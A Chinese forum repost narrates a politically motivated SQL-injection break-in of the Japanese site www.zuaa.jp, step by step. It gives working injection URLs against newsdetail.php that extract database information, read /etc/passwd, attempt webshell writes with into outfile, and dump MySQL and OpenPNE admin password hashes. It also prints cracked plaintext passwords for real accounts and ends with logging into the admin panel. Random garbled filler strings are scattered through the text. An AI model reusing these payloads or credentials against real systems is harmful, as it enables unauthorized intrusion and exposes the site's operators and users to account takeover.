原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据

8 i. d) t' Z$ i7 j: T- d
whatweb


$ @. U" B8 h  }2 Q' B利用NMAP扫描

1 f! A9 N# c9 v! d中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
: ?+ }; k9 d* k" c& b
/ u( L0 z: m+ c' j& @0 z! p
0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
9 v' f" d/ h$ q6 S
0 y$ n4 W( z# K) u' J9 ^order by 28报错，order by 27正常
5 U4 N! t8 G+ D0 C
0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示
1 m6 Y9 h* V7 O# J3 W0 q. L( u
$ F0 Z* Z0 j8 B0 A- \中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

6 M  M& m. _# R: c0x05. info:
  x$ v; X& d! Q; C, [http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
& m( N8 Q/ l, r4 p
user:            root@localhost
. T2 J+ N4 p0 W3 j! ^9 bdatabase:    openpne
version:      4.1.22
os:             portbld-freebsd5.4
& Z  s$ L6 ?5 l3 @5 `- b  R
0x06. root用户
* p7 P6 k4 N1 p7 k6 |) T利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

通过工具转换

- K2 t) ^+ _6 x; N7 I6 W- L中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
  b. }4 L: k. |( I- q4 @
9 a8 @& H! c8 R9 M" C, k$ k0x07. 利用 into outfile
; C4 b6 j' x7 O6 l全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
% P; x; F3 w6 B/ X* P" o" v$ w4 r5 G
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
( g! h% x  Q% L* H) {' v
6 w+ _% S2 @4 u% h, H) _4 E* l/ ^页面显示“MDB2 Error:syntax error”

( x) l- c/ X6 T0x08. 利用 mysql 4.1
9 O% ~' }  U2 p猜常规表名，字段未果 工具 sqlmap
* ]& c- C1 {; G6 W' P中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
9 E" K( P8 H; l
+ \; Q5 ]. `5 j; m$ ^% M# k

! ~; j9 A# \4 `" f& ^3 v0x09. 查找后台
利用 现有的各种 后台工具尝试都不行
6 P: m6 S, O# ^0 `7 O% K
0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
" c$ R& a4 D; g! w$ Y( b/ T, A
; j  u9 j$ _  s# v这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
# x' @9 P; J2 O  aopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
! M$ ]' w9 f2 H4 ]1 t% O工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知


0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

& w- l5 u6 c# D$ \
0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
( |) ]8 ]7 r1 `8 u1 ?
5 {2 y  k0 {. y' |) r解密
5 @! |; E) m8 v( A/ E$ w! ]zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0 x( l* M. ~  Q3 k$ h9 x0 S0x13. 登录后台
1 J6 F1 p6 Z( [, W7 r


0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
9 @) ^4 ]3 ]! D# v  x感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

9 s, S( q* M& V7 {) y# [0 T最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
9 E) m; k5 S7 ~4 G2 j) j

荒村狂客

哪个牛人 费的这劲 入侵的